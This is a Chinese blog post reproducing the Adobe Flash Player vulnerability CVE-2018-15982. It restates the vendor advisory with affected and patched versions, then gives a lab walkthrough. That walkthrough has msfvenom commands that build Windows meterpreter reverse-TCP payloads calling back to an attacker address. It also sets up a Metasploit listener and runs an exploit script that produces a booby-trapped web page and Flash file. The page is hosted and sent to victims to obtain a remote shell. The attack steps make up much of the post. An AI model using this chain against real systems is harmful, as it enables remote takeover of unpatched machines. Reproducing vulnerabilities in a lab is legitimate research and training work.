• CVE-2018-15982漏洞复现


     

    作者:欧根


    漏洞信息:CVE-2018-15982

    Adobe已发布适用于Windows,macOS,Linux和Chrome OS的Adobe Flash Player安全更新。这些更新解决一个  关键的  Adobe Flash Player的漏洞和一个  重要的  Adobe Flash Player的安装程序的漏洞。成功利用可能导致当前用户的上下文中的任意代码执行和权限提升。

    CVSSV3分数和漏洞类型:

    受CVE-2018-15982影响的产品

    产品

    平台

    Adobe Flash Player桌面运行时

    31.0.0.153及更早版本

    Windows,macOS和Linux

    适用于Google Chrome的Adobe Flash Player

    31.0.0.153及更早版本

    Windows,macOS,Linux和Chrome OS 

    适用于Microsoft Edge和Internet Explorer 11的Adobe Flash Player

    31.0.0.153及更早版本

    Windows 10和8.1和win7/其他版本为测试

    Adobe Flash Player安装程序

    08.0.0.108及更早版本

    视窗

    漏洞危害:

    漏洞类别

    漏洞影响

    严重

    CVE编号

    免费使用

    任意代码执行

    危急

    CVE-2018-15982 

    修复方法:对adb flash进行升级

    产品

    平台

    优先

    可用性

    Adobe Flash Player桌面运行时

    32.0.0.101

    Windows,macOS

    1

    Flash Player下载中心

    Flash Player分发

    适用于Google Chrome的Adobe Flash Player

    32.0.0.101

    Windows,macOS,Linux和Chrome OS 

    1

    谷歌Chrome发布

    适用于Microsoft Edge和Internet Explorer 11的Adobe Flash Player

    32.0.0.101

    Windows 10和8.1

    1

    Microsoft安全通报

    Adobe Flash Player桌面运行时

    32.0.0.101

    Linux的

    3

    Flash Player下载中心

    Adobe Flash Player安装程序

    31.0.0.122

    视窗

    2

    Flash Player下载中心

    Flash Player分发


    实验环境

    攻击机:kali 2.0

    受害机:win7 win10

    使用工具

    CVE-2018-0802_CVE-2017-11882-master exp

    Msfconsole

    1.创建payload程序

    msfvenom -p windows/meterpreter/reverse_tcp_rc4 RC4PASSWORD=zale LPORT=6666 LHOST=192.168.0.111 -f raw>86.bin
    
    msfvenom -p windows/meterpreter/reverse_tcp_rc4 RC4PASSWORD=zale LPORT=6666 LHOST=192.168.0.111 -f raw>64.bin

    这里会生成两个bin文件,分别为86bin和64bin估计是32位平台和64位平台

     

    监听payload

    use exploit/multi/handler

    set payload windows/meterpreter/reverse_tcp_rc4

    SET LPORT 6666

    set LHOST 192.168.0.111

    set RC4PASSWORD zale

    生成文件视频文件和网页

    python CVE_2018_15982.py -i 86.bin -I 64.bin

    调用py文件,生成攻击网页和视频文件

    开启apache服务

    把上面生成的网页和视频放在web目录中

    发给受害机验证是否成功

    当受害者点击网页时

    可用清楚看到已经成功返回shell

    至此漏洞复现结束!

  • 相关阅读:
    安全公司
    HTML5 Security Cheatsheet
    渗透1
    dos其他
    Ddos 类别
    python之控制条件if语句
    python编码规范(二)——空行,换行,缩进
    python编码规范(一)——空格的使用
    python入门基础
    网页模板的自定义
  • 原文地址:https://www.cnblogs.com/anbus/p/10148852.html
Copyright © 2020-2023  润新知